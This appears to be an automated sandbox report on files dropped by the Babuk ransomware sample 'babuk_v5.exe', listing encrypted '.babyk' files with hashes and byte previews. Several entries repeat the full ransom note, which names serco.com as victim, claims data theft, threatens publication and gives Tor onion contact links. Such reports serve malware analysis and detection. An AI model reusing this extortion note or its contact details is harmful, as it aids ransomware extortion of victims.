                                                                            Preview: ...B"~.q"...|....|.Ci.V.....oh..zps.F.z....~...pI_.'^p..`o.M..i.cnU.uO.X6^.?..*#....n=...j...F.[.~&.Q.....2......M'_....ne.!"....+..~.od($~..:..._.......r.._{........P?......zFz...9.j...).Fq.C.L..qY.=te..4<..tN.......sQ..}..`6........!m..Y.6....0.[" 9xH"..-n%..K.5{..c....q.j.v..Y..*!2.$S....B......^W..V.........O.V.......Y.g..^...E.....c..-:zX....;..R...$.F%|A.^.;."..{J...M9=.V.'.B(.-,...4..4x%...x.l@.^.o.6........|MCG..=T.yk...A...c.'l....K.-t....o}..\.ND.&.zMIp.o5&...1..Vd,.G...O...g?.8.."..?.....>7|\.l....4<O...?X&.h[.....{..........U...X.w!..}W...u..+}.zd....:....i.).T...C.-.F$......\.c..d.K..Nis&v..F.0P.b.c.St...)..Gt.+...*...e.j.KV...3m.*.s..M....Q..o.j..7KrL.mn.....{."Jp#v....X.~V'....XB.y/.z.0.J.[............z0o*.>..K....2.._.NYWDI!.......i........@..6w....ai$Wm.+*..L.[.Uh.Ps......D.R.3.J.E...../.Z.<.k,...a....!.3.&l...t.S..8UXB...}.....2..#"..*.[..2t...S3.T3......mS.........R.<Jy0.Z.o[.g...t....+.go.z.&..c.1....t.
                                                                            C:\Users\user\Documents\NIKHQAIQAU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\NIKHQAIQAU\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820201218424555
                                                                            Encrypted:false
                                                                            SSDEEP:24:ul/un/4/l9Jn3MjxXfUSFzEFkapTmmpBSnS2hkwC5ZdF:ul/pJ36xXfUGYhp66cclF
                                                                            MD5:2EC40DBFA86C4A59EFE8A94C1510E393
                                                                            SHA1:2DADBB8B9816BBC54B7A68B9EBB11E1A65D88098
                                                                            SHA-256:DA11952254CBFC9C2A61BD21B3D26F95A13C2DEAD5A868CA9998425877C981FE
                                                                            SHA-512:6472574093ECCAECA351BAFB8163A6DDED99BD0692E8F1F10792B501DF43BF7BC186BBDA1690AAFA016C35EFCE2AB6912595038F8CCFDF66701B9C2132178CCD
                                                                            Malicious:false
                                                                            Preview: .s...aoC.%<.r.....ya.tG{.z1."@...S....;..|.n..]E..iB[...6I7.]7E..4._L...l>....w.o.j}....NA....t...L"...<.{.-^....u.F..].!....-..;4C; .k....[...t._Sw.L\Y.b.o...-.?.......<......6.'.....s.i^..+.Fn..X...&.NxrQ...h........1.9...Q.@.0.|.@.;..y....i0..x..........!......k.....x...P...]....>..;.CPy}.\OH....?.....2~..`s.gFld..U..+.x..>.w...Y..t.....%W.N.~...a...Wl1....KF..i@.H".2.....X..4...F3u.o.....R.6.4r4p..*......3.s.<...ik.~...1@k..x.K|......I.n..B.....#]&u...........tO.....e..p.Q`.Px......l.b.ib.h[H...Y.olh@...}..E....U2cT......... A.t.`V.eD.ai..m..Z.Z3j...^2.9fu.%>..1.qM*.%.E.onb"@V.].-....|..m..O...@a..R?.bP.0.:..q..x..%.P..kP..T0h.Q..>A........3....j".....G..D...k.Xc.%:-.._.h0@ >,......b..y..t_M=......Fh..^.@/...>.._..S...(>R..!=.B.J.dR..D..f.t.OV......r^d.....l.......B.%9.g.....{d{.k...d..f...r,..X.Zn...*..u3E..fCQ.;..JAB .......N..;.fK..\u..;.^...q..L...$r....\K.8.....R..h...+.....O..hR{.D..X..8..X.!s.H. %........[..>./..a+`..Q...*E.
                                                                            C:\Users\user\Documents\NIKHQAIQAU\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.822592069298165
                                                                            Encrypted:false
                                                                            SSDEEP:24:UeSbH1YILnYbzbY0YYT/AlO+CanSBRSRzD/o83XTdwpvX0q:qPLYbzdYNMaERalXRuvX0q
                                                                            MD5:CA2B6548349711B6DE557D51F891C86B
                                                                            SHA1:2D093A46244D18C5AA1B6C1200824347B6AD5E4D
                                                                            SHA-256:FBCCC10122FBF8F0CA94DEC98BBE93E553EA0BC9113C73E2D7CEC629915BA3C9
                                                                            SHA-512:FB845E0A9E02FA9CBFB97697F052FD1F8AF4AC611C4CA676E3E78248E6E5B3C74C401D29EFE318B27FBEB534DBA1D3D25F26B125C8B0846E6BF467CCBFA5AB04
                                                                            Malicious:false
                                                                            Preview: ...X..$......sU...|..[..D...|.t..{..k.(.^+..wz.......V.L........v=.B].9h...X...n.<.\.....#1.....x....W..|.{L....m~.h+S...>.)4..RI...Mh..{]...^.....i\.:K...g..-{.zn.}..>8.Da..r...... .....H0k....&.3`.u..Vl....tz...eX.^k."&..r.7...~.E.xU5J._...%.U...6.hx5..k...tuQ..[....'...\..Q..g.a.&.K*..V..Z..<.q..t.B...MuD(......rO1.../.~uw.....1b...4x...M.6.Q]P...!j.......uB.$........D.b.g...V...p.Ol.Iep....EW.9....6...D:.....=.u.m...F'$@e..7.x.."..7...U..v-...1sd%..f@.@.8bW...b9.aU_....Fz@.e."..t.z.........8.W.:...<.F..~..0..S?L.2..A..`[.....N..0M.k{...(u......7M...i......]fM+..........,.4......]v.Ox./..+..r...%}..2f[..$.. .[~..y<M.........~.`.;..g.7.......pB..k.$.Ee'}.(.}U...r.Z.gC..6..L..9<....^....$-....n$....A...o....8&..I...{.84S...2.7..|./.n.dD\.X(\..F..;.&,..*.x9.g-oa.W.@Q3mX.....*`>...[.wv.O%a...........U.Q...I..$..!90j9..+...j%d".....3.[..$..Uf0I.C.O.x...........n.3m........6.'........sV,2y....i.Ym.i.....F...Fi.....I...E=V.......
                                                                            C:\Users\user\Documents\NIKHQAIQAU\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.847382388132021
                                                                            Encrypted:false
                                                                            SSDEEP:24:nJrMpNqMkBX8Q0/l1oWkdj6c0XMV6zM9c5db2VNVR:nJr2NkBXKl+jB6g6zM9EdyVx
                                                                            MD5:A76AA48F6BB50EA71D1639B23A6A22B4
                                                                            SHA1:C78112F833E4E590C2BD69271B92EA74C3441637
                                                                            SHA-256:795F182F8C5B44C34EBCF0CC2CF4007227F390B5FA96881CECB8FBDACE4D1888
                                                                            SHA-512:34F65B1B994AF7960A85316F2DABE05AF95838557AF7AFFD25C1754E24FC0D1C1896C0847F01AD8C409693B9C4405E04ADF2442BC3A7F69A2BE2D50037E16B55
                                                                            Malicious:false
                                                                            Preview: .$.),.....F..`$...BG.n..Q..GNmV.p......d..J.....%.U.K...9X1}.".q...e@v....O.mbR...;.1ZP7E..kSb..mE).x......^9...WD..C~.3...^,~{"8....4h.Xi...lVV...Y.RLmV..?R..Z`...2..V..y.ae.J.1.....t.IbV..s..~Wi.....\.mU....%.....I.E..3Q..5Q....?6g-&.~.k.V.O...GEQ"...9Z.U.F*..8X.NP..[....^.....H$pW.$.BIz..Y....@.V.w .\.,.*./3.6<..3...W...Z[..q6.i.r..[q..O..G.S.^0..h.X...E...\..!............z.../.E...Vc.xg...T].dPlCDF...A./.,...}........\.g.'^H.G.X.1....,{..&...U...VX...9.|.8......l...8...@.o......Ktw....}.'....R..6Q.....S.T....x9... ...t P.....I..{..........}u.`.?.r|..[1...L...=..ZC"X.U.gN.\..t.l..;.0B>#..urA......'._4n....q..?kh\........huB...v:.....%>j..s>..9....E$c....8...M$....i.9..z...N.....s../..2.Q..#..............%.{-.'.D,...W...Q...9z..-r..SPW\..B..B.0C.......{.nX..w.8+.aV.x5...Obo...!..h....#Lp..'Sq.N[.Hp.p.F..._O...P...;...R..Pp.{.../U....x...C...L....9.b....W..l.s.....A.].a..P..2.....5...D.*@..'...5...W....$..-G.a...B....g....)*.....4..<..%.}.e
                                                                            C:\Users\user\Documents\NIKHQAIQAU\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.811960614549262
                                                                            Encrypted:false
                                                                            SSDEEP:24:i7h9QiQssOUyhkbynwYG5NNl64j4cE160oPm+ZXdb/t1JKBq3o:izp4OFynR64j9m+ZXdDt/cR
                                                                            MD5:2FACF243BD964F7F3BE964DDF9E046DB
                                                                            SHA1:2DD2E41381FDE0D5DF9DE002F71D1024FC7914D0
                                                                            SHA-256:590C5BCBD62A45937405D312D889C598BD9A06577281F6D523E4FCB07CC116C9
                                                                            SHA-512:B23488811AEC64CBB6CDCD874600225711E2346B4714F32AC6DC4ADCB0F3A59026651209D049BE08E9264EA39005B7A9A3EFA3899B51B159F5B361B716A54935
                                                                            Malicious:false
                                                                            Preview: 6.*cM..GN'Z...W........X:>.{#..2n.R..9.;...?4Xb.4du%...`...D.~.}.1g...y..,d..3A.'.a.JKc.!'.V...te..Q.X.....7...@........q..T$.Z$.Q.C.%.d.2....l.}..P.......D..........o.;..8.i..L.MW,...]....c.P~.>.[...C...FW....k..WH.LG..\].o$w.....{s-.p./Ut>%.;.)a.n..T..ux...>r..w.z.........>...>Kh..g..0.c...6Q\A.9...;.O....P8...=.. .S..N.w..h..j..`G..s.s(oUN........3...L_v`.CM..-..4........h..^.7D......;....(D5!#.7....+..1...z..j.q.k.F..uX.z..1.x[...,......r......eF.........cuk....Z...#V.5.7]...9#...!!..o..)W.|.D!...!..*..].Hb...-.&....E.M.........!.q8UN...E.n....F.W."i..>..1...p.]Q.>.K.F.XI..e...v-K9......]...=x.3...t...w..f.......D.....T..td-....$.w.E?v...1s9..&..nj....2...0.n..W..!..l..9Z.k(g.b...3.;.....p=.1.bd3.5......M.....2.J..0Y.S)..Zn/...).....a.O.z.~7G5..........|)..%..e.^N1.&9%a..".8<o......[...&.Cx.U.+x...S~.....z.sKU+.u...p.j...W...@.[...(.hv.R.....h.m.F]..7....[..P.J=....:.....jd..j.=....P.!.Z.pA....d8.g-..Y..8.%.O(..{......#../.....
                                                                            C:\Users\user\Documents\NIKHQAIQAU\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8243500017427845
                                                                            Encrypted:false
                                                                            SSDEEP:24:i0yH6NEKYCU2iG+z53O1EhLL5UK72QaU+tYHm9iQakTRxFycntHS/:dyHrKi5z9O+5X72QstYH4zzRn5S/
                                                                            MD5:6C55829841A57100D6C047E4E9693F2B
                                                                            SHA1:02A2355BD35924E3CFE86F5A1778D1899894AA2A
                                                                            SHA-256:76ACFB2F5BF75F9FDC1CBA7BB2653840B406F3AB2579B9DF3CC0F28B92A1BA6C
                                                                            SHA-512:3333C8FC6780FCA595F081A64B79A927D3E66B7DF236E1ED83073331A15118E387B247B6AFD0E3BF1D9E18A6A0440098BF82D999E0DA4C0042F92E8CCC9937B3
                                                                            Malicious:false
                                                                            Preview: .>.'...].8..2...aj...ZO2..}".?T..o.*.DS.D..3x..5.o.v....ZOG.:.B...ho.-.OS....S?.L....:....?...s.o...~...H.....e...-|.....!%.K&..dR...~?..H..D.+)...1V*<.m.g.e..g_.r.$..q...i......[..a*..-*.@M....M7M2~.....S...Mr.p.Q|.............9..A...a......y5i4......Z...............8%$...$.....GF.k^......*k..-.....#.W....%._.:...Za{hy|.F.M5l...j......S.uv.{.~=....Z)2.Y..$.l.K.,x$h.u.........7.Y.............P(u...R....F..q.`a"..AW........0.^.p....4R...q.._..}r.rX6.c$K...".Sp...j.."@.e.G..o.0%"./t..f.C;..:..e..Y....H.M!z.Y..45.....]".3bZ.]o.;.6n`.wQ:\sx.I}c...X:%q:...-....B...]....^):5......`(S....}&v...>.M.~. ._Z.,M.A3L".....e...LSR..w.....c}.......w.svD...'.EZ....*..k7..Z~.<....=.C.[}zIsO..?.U.E.}58+.....$.........eU.@..E......T]$Oo3.......IR.?.&...Y...l... .1.ePP..^m.yO....H1........w.R.g.2kf`..9..Ua....o..]..F.b.`.o.?...lp......b....+R..<....&.taRBur.....gW.o.[..R...7`...t...<.E.Gu...^.o.A9.[r...;..5./$".X........{.......Q.8.....g..{0..
                                                                            C:\Users\user\Documents\PIVFAGEAAV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\QCFWYSKMHA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8145076640498985
                                                                            Encrypted:false
                                                                            SSDEEP:24:e4b/+uy0igRfWkCu6aljiXQiFtMr2/bWZdSnf3bmrb/g:e4b+u/iUv6alsDFCHZEnfro/g
                                                                            MD5:AB3DB307994C32FDADE114E6503FF40E
                                                                            SHA1:A6172395A539F0E161682C57CD3E038CCAC1E590
                                                                            SHA-256:FC5EF556ADF34CB47010A315BB88C9D25AFEE2F700BF0E4C25246C6726C51A82
                                                                            SHA-512:7F90E57A25E32D84DBDEC741B8BFC9146368DFB16B9E67FCB786E7D2BEE17EC005EB872D9649EA0EB55C05EE3AC98864400E5354734BA48388CA9870EE6B7764
                                                                            Malicious:false
                                                                            Preview: .D.r.Kb.%.Q\...dv..5$..I............$..(..,.3."...#..*..F.....R5..Aar...s...%...}.@.\{.`R......@..i..0.K.)...&......R..(........R...u...%P.....@.W.z)...V..>I.5.#..r.c.p.,..87.R....@.....,rw...Q.9}A..~...{...bH%.)*.[.QUYH.+\...H....|.....KJn.l....=.s...f.....f..1.....@..lP.^.....AW.....66.../..j3.WFZ.F.....p..jI..~1F.N....J.qr.C.P....-..>.%.4.......y..B...t.d.d.H........=..|.P.Q.....w..0.....I |\Fdw..A;..J.F.[...$i^.h.s..-_...<...V.....X..M>.HT..uz>..$&A2%M...}5..RaW.K..Y....M..k.MQt|.v).o.2M..m..?.x.r...9k.hiA.mq...WK..?.E.R.q./.k...M....05..'...9t\.....J.K......O.......l.$I"dp.....l..h.x=z7..'.....C)H..^..........j .J.{.k..!<O.~*k.Q^.M.|#.+.....RK."..p..).A.$.#c %M...hd=l.~....p.RM..FPI@{..p.zQ/'.m..........Lc.G!..".5.".(.?4.....@..t....f....3..2G....W..S.VJ......u>B........=.].4..wk(.....=a..X.8F.....s.]..p2|K."......z%....aH../.W..R.y|...2.)......0.7...J.......a.eP...].+...uR.$S........}E.}.[!...).........i.P...Qd0A.8~..2...c.pf..
                                                                            C:\Users\user\Documents\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.798389431214604
                                                                            Encrypted:false
                                                                            SSDEEP:24:d1w4tHXFu45FgJHopTkp4bh/gVeAI7wiuxP/nu/e/BXQspnltHya+sFzGg:d1w4uEsHvAh/UIDWHuSpnltHM8j
                                                                            MD5:B3A963674C207915EACC7B38A6447A5B
                                                                            SHA1:F4A14FCFA9B2F9FA76CD044DAEADE3E1B14B2800
                                                                            SHA-256:A3EE956D5E4D3A6BEFAF8AFF6A7FC8193B50995136C95B93FE1B4826B6FD88D2
                                                                            SHA-512:8AE69550E9E83DB48ABA3CB67760A42701EF1CFA2B2CF0FDE53C549B98B913D075A0A89947DA3D7BAE6A8793C2CD0D61CF3FFC202D8CC0AC03D5E3ACA1576474
                                                                            Malicious:false
                                                                            Preview: ..Q.Q..5./.n....8.B..r.K..../.5#.M..Zv3)Bn% ..s$.9(..kT..0#....Nyn..m..E.ut$...."p...4.B.2...M....5$..<..0.#.c.......~s|.g..csb.s.#.x.....n....,....^Ku..H.`.gA.Z.^l.&.Q..d..b..$.9*.. ZA.....f....K...J..la[..U.?|..^..rN..?.Bh.1...'>....p....L......l..u...<OJ.zU...^...2...VB:..P.\..?........`.RT......*....F.s..9..)...=Z#..@b}....e.f.~...?..:.TM]/..w;.JSQ}...~)..:........8.J.&.kc..wc....*+.....B.I..+q..%^..y2...Z.P.GKfUP..tp...U.!..$...; O.E...G....W<...B.x..>...>..To....0...=...fo.(...@.o.&5 ...QR..5.....8.h..5.X...g...][Fl.w.;..).N9.j.v..nk........9.u.Y.~.k.-......^.)...!..P...I...N_P..#.#....5O.j^....A\.'...T...+. 9.ms......H.\.Q....N.:.?.\..q<.].H...6^.El.......p.....B.Q...M..zWy.N.....:.&.H>:.......E..e../.o....),i......@b]d.......I..."J...l.n]./.1....0X.S....P.X.........y.%.T..D...6!.#........y...1..)B&...LF0cT...?=./...............5m...yz.oTR.M.`L`..s.....`..&.....P...;+.@)..y.......!.9)..8....v..H......K..6@....8a~..&..
                                                                            C:\Users\user\Documents\SFPUSAFIOL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.825265249949243
                                                                            Encrypted:false
                                                                            SSDEEP:24:3Kd/EZzHpcsVj98XWNxpG+OuA8kQeDNHKTEiFdsmaC8I4EZfU5REb3cBEese:gcZzHdYXWNxU+OGkQeViP8mSEZrM/d
                                                                            MD5:16C9726F77356C85DADB830CCBA4DC87
                                                                            SHA1:26DC6EEDC22DD3231FA68008E166605D707721FB
                                                                            SHA-256:F201336DC91CC08153A6B41B7C6E1632501E616D5D6D453CD96FC145C62875F4
                                                                            SHA-512:818F9B6305A0EF792768715D942E5CDE7F161AF31FB31EA48F8CBEF551CF4C8922061D48E4DF94A8496C301641C287C875A94B546FBAAFB219C2FBCD0E60896F
                                                                            Malicious:false
                                                                            Preview: 6g...~.Z.M...I..P%.M|p.v.....>.IS.W.Q..obTLXyk:;....)a.M..L.....:.#oQ...P7.../~M.`vq.Fo.OK.......(.._y..G.....7..a..M..w.....!...j..2.T..;.s|.x.k.K.c...+Fw.Y&.K.V.(*....;_|.L..+......@...O.Rje..v.....F..M.....*cgF9.....Y.z...7.....5.d.(....u.=..H...S...U.$..aLj>.O.....m :>.r.od.E.......cnq.....?d;.....]..x.h..:..........}....1..8w.g.....OM...-...1...k7.0...[.0.;..t.p...EN.N.J..=Ox...a..Vf~L..... \...=,d..e~....W..o[.N.u.H.&.A..Y..<.x..x...<..t.F.b....nwU.jh:%..Jhx.......E7p!.6A.0.$.:v..Fg.[A.IKo4.C.fA{..A.nBE..r-.+&.:..W.......2f.&.._.}o.. ..\.}.N...O]r.........B..q....5X.-.2..w)..A...Y....A.K..-.&.A..5e....F..*>.....i...'6....'.0...?.3.RL.N..1.......ZL...X6....`.5.ue....lq.5.L.....V8A..4....K.l.cS.*..y.b..j....y`..y.#..].`..."6.n..3.2.yLrHn ..6./%.#....$?.5....C..f.k..p.Gy....nxVx)x.d...m.....9vx...(....].......O.>..8R.2w.q.<l....3N.M...gp..$T.....4............/..,G.H.@.t.2.7..@...w.K.....P&U...E...I.b.>@ h^..{.s9..#\.W..+...........
                                                                            C:\Users\user\Documents\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.818762643644819
                                                                            Encrypted:false
                                                                            SSDEEP:24:cjf6OOTONSj4NGSMFzsr1d0Pz6Wvl13TLLHktQ6PM7hl0lUOAYGJJAASxCq:cjjOTV0MKr4NtRHHmQ6PMj0KOABgd
                                                                            MD5:DEC42CF278E15CBCEBA554144EB116E5
                                                                            SHA1:5582394DBE5BBF6B9DAA61BEBAF9949B47BA11D1
                                                                            SHA-256:C8D2EF3A3D7BD28B93C8D5A392140F4292EC6B3FFE6B98B17662B67B521C83A2
                                                                            SHA-512:D07FF9E3C9572B5EEC59E3C889D1A61943A47EE5CAACD6D07BEAE969A2862F025DE3C79C63847F195B1500926205391DC4A141D7138D6C7A396C77C2848ABB81
                                                                            Malicious:false
                                                                            Preview: .$dBk.b...Z\..wx.....5...#.<.z....h.3.EO.^X..=.]...^...s]\..:Am...r...\..'.f.1..ce...g.....3.u..*Q...C.t..=....W......= .!..\..'...'.=.Sd.$..Q..../......O....(\..}RC....]..N4=......5..G..8...vA...8............G.Y.}a..>.zp...wj".i......p..s......z.L..H#F..8@t....S..%%..gA...Y.$....Nru,'..orI\...3..%?...z..Y.;.T!4.19gR.y....!`lPZl.M`...Id..Y.RP.t. ..k.m...v....3..i...r..Sy.....6...+aU...jX..../*tYX.wW.Lho.{%[m..\.Z....]H.l./....z6...>arM....`s..v.~x.K.sQ..5 |AMm...f.|..^....Z&fx.F. .@..4=..Z....t..".Hq9.<..N.. q......(_..N.,F.BI...q...H=.....I.....t.T@n...<./o..;.i,...t.}wXJF.YGF.B...v.....55Wn..v..Uq.Zh...4M...q..# ...^....B....i.....I.r#..I.Q.7.)_..M;#...q.7..|...R.zv].j].Q.S!.mLR.D.Z...rv/..e[.f..vy'>#....Kiw...c..a....o.=.E?..<"h..r.....F...|."..g.n...,...og"Nb......-.1..c...]..Q..B.z.a.....%HX .{_..$.E#.h3..Q..].`....*#X.....7.Y"...V..\....@._4.CY[..X..."..(6f..Ot.v'..1.EHm.Dl..Bvh.u../...|.Q.=S....].....kJ.>.W..j...W.t..z../~.GD]0~oT4u.U..].
                                                                            C:\Users\user\Documents\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.845666152052158
                                                                            Encrypted:false
                                                                            SSDEEP:24:z4t8MkagLDLhq3+ZDaJWKE2Snj5pU+Bw4uCIq8iy4JF1rv0wMOdo:sthWpq3ADaJZE2m1pU+BZIS71rvRo
                                                                            MD5:E053063B3B2E3494EB74AAAD818611CD
                                                                            SHA1:5CBF46187F01C248B2EBFE7E16150F9122B5966A
                                                                            SHA-256:89A6B65B7E905382E5040CADA2C2A63C5E2466E1158945A7DA676EF5E8B7D80B
                                                                            SHA-512:7F5B86018D896518193E616474CDACAC8D974179AE66875EF4F3DCDD6278E22CF52475C83B9992A1E2BFE928F632BC4E51DD45236B4323BDCA0D8437DF2629CB
                                                                            Malicious:false
